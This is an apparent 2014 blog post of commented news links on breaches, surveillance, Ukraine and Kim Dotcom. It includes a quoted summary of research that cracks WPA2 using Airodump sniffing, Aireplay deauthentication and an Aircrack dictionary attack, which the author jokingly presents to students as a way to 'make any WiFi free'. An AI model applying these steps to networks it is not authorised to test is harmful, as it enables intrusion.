Tuesday, March 25, 2014
Very interesting graphic of the military downsizing after the fall of the Soviet Union. Let's hope all those nukes went back to Russia or were dismantled.
Ukraine Battles to Rebuild a Depleted Military
As the Kremlin began its invasion of the Ukrainian peninsula of Crimea last month, a days-old government in Kiev turned to its military to stem the tide. There was an immediate problem: No car batteries for the military vehicles.
With coffers empty, Ukraine's fledgling government appealed to the U.S. embassy for help. The embassy said it would take weeks to get assistance, so the government had to search—among its own people—to find a regional oligarch, Ihor Kolomoisky, to kick in the funds to buy them locally.
I am coming to the conclusion that it IS smart to deliberately understate the size of a breach in the early releasses os information. Apparently, when you get around to correcting (admitting) the numbers, no one in the media truly cares.
ZIP Codes Show Extent of Sally Beauty Breach
Earlier this month, beauty products chain Sally Beauty acknowledged that a hacker break-in compromised fewer than 25,000 customer credit and debit cards. My previous reporting indicated that the true size of the breach was at least ten times larger. The analysis published in this post suggests that the Sally Beauty breach may have impacted virtually all 2,600+ Sally Beauty locations nationwide.
… I asked Sally Beauty to comment on my findings. They declined again to offer any more detail on the breach, issuing the following statement:
“As experience has shown in prior data security incidents at other companies, it is difficult to ascertain with certainty the scope of a data security incident prior to the completion of a comprehensive forensic investigation. As a result, we will not speculate as to the scope or nature of the data security incident. Please check sallybeautyholdings.com for updates.”
[Note that they do not say that they haven't already completed their investigation. Bob]
The zip code analysis is available in this .csv spreadsheet.
I ask you, how would Christie know when to close lanes onto the bridge without this?
I’m driving around Bergen County. That sound you’re hearing is a device that alerts you any time your E-ZPass tag is scanned. The problem is that it’s going off like crazy and there isn’t a toll booth in sight. The device was created by a man who is protective of his privacy, but still wanted an alias that makes a splash. His cover name is Puking Monkey. Our ride takes us on the feeder roads surrounding the George Washington Bridge including Routes 46 and 4 in Fort Lee and up the northbound side of the Palisades Parkway and all the while this detector keeps going off, even though during that entire time, we didn’t go near a single toll booth.
Read more on WBGO.
It's simple. Just put FBI “Stingray” technology in a drone. Why didn't the FBI think of that. (Of course they did)
… London-based Sensepoint security researchers have developed a drone called 'Snoopy' that can intercept data from your Smartphones using spoofed wireless networks, CNN Money reported.
The Drone will search for WiFi enabled devices and then using its built-in technology, it will see what networks the phones have accessed in the past and pretends to be one of those old network connections.
Spoofing WiFi networks that device has already accessed allows Snoopy Drone to connect with targeted Smartphone without authentication or interaction. In technical terms, The Drone will use 'Wireless Evil Twin Attack' to hack Smartphones.
Perhaps I see this differently. It is easy to ignore communication that does not originate or terminate at specific locations, or involve specific individuals (or countries). All you need is the guts to face the possibility that the next terrorist act would have been easily prevented if you had been monitoring that communications link.
The New York Times report that President Obama will call for an end to the bulk collection of American’s telephone metadata is yet further vindication for Edward Snowden in particular, and for transparency more generally. The only reason the President is proposing this change is because, once the program became public, it was unsustainable in its current form.
(Related) Will we lose this ability?
Ellen Nakashima reports:
Federal agents notified more than 3,000 U.S. companies last year that their computer systems had been hacked, White House officials have told industry executives, marking the first time the government has revealed how often it tipped off the private sector to cyberintrusions.
The alerts went to firms large and small, from local banks to major defense contractors to national retailers such as Target, which suffered a breach last fall that led to the theft of tens of millions of Americans’ credit card and personal data, according to government and industry officials.
Read more on the Washington Post.
It would be nice to know how many of those 3,000 cases involved breaches of personal information databases as opposed to trade secrets or intellectual property, but it’s good that the government is sharing what it has learned with targeted entities.
[From the article:
The number reflects only a fraction of the true scale of cyberintrusions into the private sector by criminal groups and foreign governments and their proxies, particularly in China and Eastern Europe.
While some companies are encouraging BYOD, others are requiring employees to stop any personal use of their equipment. (My wife tells me I must buy her a cellphone and a computer.)
UK – Bring your own device (BYOD)
by Sabrina I. Pacifici on March 24, 2014
Bring your own device guidance: “Bring your own device is a term which refers to when employees use their personal computing devices (typically smart phones and tablets) in the workplace. Permitting devices which you do not have sufficient control over to connect to the corporate IT systems can introduce a range of security vulnerabilities and other data protection concerns if not correctly managed. This guidance explores what you need to consider if permitting the use of personal devices to process personal data for which you are responsible.”
My favorite scofflaw. (He's hardly a “fugitive” unless that means something different in new Zealandese) Think I might buy a few shares...
Cyber fugitive Dotcom mocks authorities: 'From 0 into a $210m company'
Kim Dotcom, one of the world's most wanted cyber fugitives, on Tuesday gloated over a deal that will see a cloud storage firm he founded while on bail listing on the New Zealand stock exchange and valued on paper at NZ$210 million ($179 million).
The flashy internet mogul, who also goes by the name Kim Schmitz, is fighting a bid by U.S. authorities to extradite him from his lavish estate in New Zealand to face online piracy charges over the now closed file sharing site Megaupload.
… New Zealand company records show Mega Ltd's shareholders include Dotcom's wife, through a trust, with a 26 percent stake. Dotcom is not listed as a shareholder nor a director, but on the Mega website he is called principal strategist.
(Related) Why are New Zealand and Australia overreacting so easily?
Doubts over computer hacker case
Matthew Flannery, 24, of Point Clare, was allegedly an international hacking group leader when he was arrested while at work at a Sydney IT security firm last April and charged with computer crime offences carrying jail terms of up to 10 years.
But in Woy Woy Local Court this month magistrate Derek Lee was told Mr Flannery expected to apply in May to have all charges against him withdrawn and dismissed.
The application will come after the Commonwealth Office of the Director of Public Prosecutions over the past year has downgraded the case from the District Court to the Local Court, modified the charges, sought six adjournments and agreed to vary Mr Flannery’s bail so that he was not required to report to police three times a week.
For my students to get the most out of their technology training...
Tech Videos — Best Of The Best YouTube Technology Channels
New technology, be it gadgets, computers or broader innovations, can be difficult to understand. Fortunately, there are a number of YouTube channels that help you get a grasp on the latest and greatest. These sources provide news, reviews and in-depth look at what’s shaping the future. Here are ten must-watch channels every geek should subscribe to.
For my Computer Security (and Ethical Hacking) students. What's better than a Free WiFi site? A “Make Any WiFi Site Free” tool!
Researchers Outline How to Crack WPA2 Security
Published in the International Journal of Information and Computer Security, the research outlines how the Wi-Fi Protected Access 2 (WPA2) protocol can be potentially exposed using deauthentication and brute force attacks.
"Thus far, WPA2 is considered to be amongst the most secure protocols," according to the researchers' paper. "However it has several security vulnerabilities. Until now there has not been a complete and fully successful methodology capable of exposing the WPA2 security. This paper provides a novel way of successfully exposing WPA2 security issues by using a complete dictionary that generates all the possible printable ASCII characters of all possible lengths."
… "At the beginning, the area was scanned-sniffed with ‘Airodump’ and then a deauthentication attack was made with ‘Aireplay’," according to the paper. "Through that, an instance of the PSK was caught. Finally, ‘Aircrack’ was attempting to reveal the secret password by using the instance of the PSK and matching it with every record of the dictionary. For these experiments we used a very big [Please! This would fit easily on a small thumb drive. Bob] dictionary that consisted of 666,696 standard printable ASCII character records of various lengths. ‘Airodump’ and ‘Aireplay’ are commands of the ‘Aircrack’ suite, responsible for sniffing and deauthentication respectively." [Aircrack is a free wifi network Auditing tool. Bob]
In all but one of the cases, the key was easily found, the researchers stated.
… The best way to protect an 802.11i network is through the use of WPA2 in combination with MAC filtering, the researchers recommend. In addition, changing the encryption key periodically can increase the level of difficulty for attackers. The more complex the password, the more the difficulty will rise as well.
Apparently there is a market (audience) for anything.
Watch Jerry Seinfeld’s Web Series: Comedians In Cars Getting Coffee [Stuff to Watch]
American comedian Jerry Seinfeld is probably best known for the sitcom that shares his surname, but his latest venture takes the form of a free online web series. Titled Comedians In Cars Getting Coffee, the show involves Jerry Seinfeld driving famous comedians around in classic sports cars, before stopping for a cup of coffee.
The brilliance lies in the simplicity of the format which not only celebrates comedy, but classic cars and the ability to talk at length about virtually nothing at all. The show is now in its third season, with a total of 23 episodes online for your perusal.